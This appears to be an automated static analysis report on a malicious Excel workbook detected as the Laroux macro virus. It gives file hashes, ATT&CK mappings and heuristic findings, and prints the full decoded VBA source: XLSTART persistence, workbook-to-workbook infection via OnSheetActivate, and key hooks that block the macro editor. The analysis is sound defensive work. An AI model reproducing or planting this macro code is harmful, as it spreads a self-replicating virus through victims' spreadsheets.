Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5149bbeee0b8f748…

MALICIOUS

Office (OLE)

43.5 KB Created: 2012-04-12 03:07:22 Authoring application: Microsoft Excel First seen: 2015-10-04
MD5: b54aaee4c0e12211e02ec53c39150a60 SHA-1: 1a40ea11c3e74154b3ebb8e359641043b8564f8e SHA-256: 5149bbeee0b8f74889f1318d572321305380edd2f11917416265f2d20e67f495
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1055.012 Process Injection: Process Hollowing

The VBA macro contains an Auto_Open subroutine that copies the current workbook to the Excel XLSTART startup folder as 'StartUp.xls', establishing persistence. It also hooks keyboard shortcuts like F11 and F8 to evade inspection of the macro editor. The ClamAV detection of 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
    Application.OnSheetActivate = "StartUp.xls!cop"
  • VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION
    The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
    Matched line in script
    Application.OnKey "%{F11}", "StartUp.xls!escape"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1153 bytes
SHA-256: 2b98e88dfafbd2a72ee4a7f0c2794675f5508d12c3e6c72292ac2f9ade8bc7dd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub